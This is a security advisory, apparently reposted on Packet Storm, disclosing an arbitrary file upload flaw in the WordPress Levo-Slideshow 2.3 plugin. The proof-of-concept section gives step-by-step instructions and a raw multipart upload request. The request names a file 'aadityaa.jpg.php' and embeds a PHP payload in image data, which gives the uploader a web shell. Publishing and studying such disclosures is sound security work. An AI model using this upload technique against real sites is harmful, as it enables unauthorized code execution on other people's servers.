what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Levo-Slideshow 2.3 Shell Upload

WordPress Levo-Slideshow 2.3 Shell Upload
Posted Jun 8, 2016
Authored by Vulnerability Laboratory, Aaditya Purani | Site vulnerability-lab.com

WordPress Levo-Slideshow plugin version 2.3 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 91775de6a26e93b2855a33e099c804901147d66ccd04b4eb384eb92a9f0580b8

WordPress Levo-Slideshow 2.3 Shell Upload

Change Mirror Download
Document Title:
===============
Wordpress Levo-Slideshow 2.3 - Arbitrary File Upload Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1854


Release Date:
=============
2016-06-07


Vulnerability Laboratory ID (VL-ID):
====================================
1854


Common Vulnerability Scoring System:
====================================
7.5


Product & Service Introduction:
===============================
Make sure you have a Levo slideshow a very effective technique to display unlimited number of product images within a single
box and just takes only few minutes to accomplish without getting too much into coding. No WP slider plugin has become as
wide-spread and as popular recently as this particular free WP Levo slider, offering a marvelous method for displaying a lot
of content in such a minimal space, and to mention also a great way to highlight your best and most popular product images
or articles in an enhanced way. And on top off all that, this indispensable, yet smooth and free WP slider plugin is incorporated
with amazing set of features including a colossal space set aside to main flash image, a miniature sized image, image reflection
option, description box with title, navigation arrows, auto-play/pause button, auto play timer into your WP powered websites or blogs.

(Copy of the Homepage: http://wpslideshow.com/levo-slidehsow/ )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered a arbitrary file upload vulnerability in the Wordpress Levo-Slideshow v2.3 plugin.


Vulnerability Disclosure Timeline:
==================================
2016-06-07: Public Disclosure (Aaditya Purani)


Discovery Status:
=================
Published


Affected Product(s):
====================
Go Responsive (Themes)
Product: Levo-Slideshow - Wordpress Plugin (Web-Application) 2.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Levo-Slideshow v2.3 wordpress plugin web-application.
The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on
application-side of the service.

The vulnerability is located in the "admin.php" file when processing to upload via the admin.php file own malicious context or webshells.
After the upload the remote attackers are able to access the file with one extension and exchange it with the another one to execute for
example php codes.

The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.5.
Exploitation of the arbitrary file upload vulnerability requires no user interaction and an unprivileged application user account.
Successful exploitation of the vulnerability results in unauthorized file access via arbitrary file upload exploitation.

Vulnerable Application(s):
[+] Wordpress Levo-Slideshow v2.3

Vulnerable Module(s):
[+] /wordpress/wp-admin/

Vulnerable File(s):
[+] admin.php

Affected Module(s):
[+] /uploads/levoslideshow/[ALBUM_NUMBER]_uploadfolder/big/


Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction and with an uprivileged application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Login as an unprivileged user, which has no privilege of even uploading a plugin
2. Go to http://site.com/wp-admin/admin.php?page=levoslideshow_manage
3. If any Gallery exists than don't create and go to "Category Management"
4. Click on "Add New", Upload any .png / ,jpg image from your PC and intercept the request
5. After Intercepting the request while upload, Send request to Repeater
6. Change filename = image.png.php and in $POST image data add your PHP Backdoor between image chunk . It should look like this http://postimg.org/image/ih4lwyad7/
7. Forward the request and go to site.com/wp-content/uploads/levoslideshow/[ALBUM_NUMBER]_uploadfolder/big/[YourShell] to access your shell
8. Successful reproduce of the vulnerability!


PoC: Exploitation
$GET: http://127.0.0.1/wordpress/wp-admin/admin.php?page=levoslideshow_manage&view=manage_album&album_id=1


--- PoC Session Logs [POST] ---
$POST: -----------------------------13856199112125898801554614298rn
Content-Disposition: form-data; name="task"rn
rn
lvo_single_image_uploadrn
-----------------------------13856199112125898801554614298rn
Content-Disposition: form-data; name="album_id"rn
rn
1rn
-----------------------------13856199112125898801554614298rn
Content-Disposition: form-data; name="image_title"rn
rn
Okaiern
-----------------------------13856199112125898801554614298rn
Content-Disposition: form-data; name="image_description"rn
rn
Hackedrn
-----------------------------13856199112125898801554614298rn
Content-Disposition: form-data; name="image_file"; filename="aadityaa.jpg.php"rn
Content-Type: image/jpegrn
rn
Garbaged PNG codes....
<?php phpinfo(); ?>
again Garbage Png code..
....

Note: I am Uploading a Real png image first, intercepting it's request, Sending to Repeater and adding PHP Backdoor withing the chunks
of PNG image as i shown in image of above PNG. and access shell :
site.com/wp-content/uploads/levoslideshow/[ALBUM_NUMBER]_uploadfolder/big/[Shell.png.php]


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the file extension. Restrict the extensions and strip codes out of all image files. After validation force the script to use an image extension.



Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the wordpress plugin is estimated as high. (CVSS 7.5)


Credits & Authors:
==================
Aaditya Purani - (https://aadityapurani.com) [http://www.vulnerability-lab.com/show.php?user=Aaditya%20Purani]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™


--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close